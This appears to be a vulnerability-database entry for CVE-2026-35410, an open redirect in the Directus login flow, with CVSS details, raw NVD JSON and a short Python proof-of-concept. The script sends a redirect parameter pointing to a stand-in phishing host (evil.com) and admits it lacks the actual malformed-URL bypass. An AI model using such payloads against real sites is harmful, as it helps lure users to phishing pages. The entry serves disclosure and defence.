Security Vulnerability Report
中文
CVE-2026-35410 CVSS 6.1 MEDIUM

CVE-2026-35410

Published: 2026-04-06 22:16:22
Last Modified: 2026-04-20 16:43:56
Source: [email protected]

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.16.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-35410 import requests def check_redirect_vuln(target_host): """ Checks if the target Directus instance is vulnerable to open redirect. Note: The specific bypass technique depends on the malformed URL pattern. """ login_path = "/auth/login" # Example payload logic: Attacker tries to redirect to evil.com # The vulnerability allows bypassing the isLoginRedirectAllowed check malicious_payload = "http://evil.com/phishing" # Construct the full URL url = f"{target_host}{login_path}" params = {"redirect": malicious_payload} try: response = requests.get(url, params=params, allow_redirects=False) # Analyze response headers or body for the redirect if "evil.com" in response.text or "evil.com" in response.headers.get('Location', ''): print(f"[+] Potential Vulnerability Detected at {target_host}") print(f"[+] Payload triggered: {malicious_payload}") else: print("[-] Vulnerability not detected or payload requires specific formatting.") except Exception as e: print(f"Error connecting to {target_host}: {e}") if __name__ == "__main__": target = "http://localhost:8080" # Replace with actual target check_redirect_vuln(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35410", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:22.097", "lastModified": "2026-04-20T16:43:55.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.16.1", "matchCriteriaId": "E86A8769-F082-4253-9D48-B6B484CA61FF"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.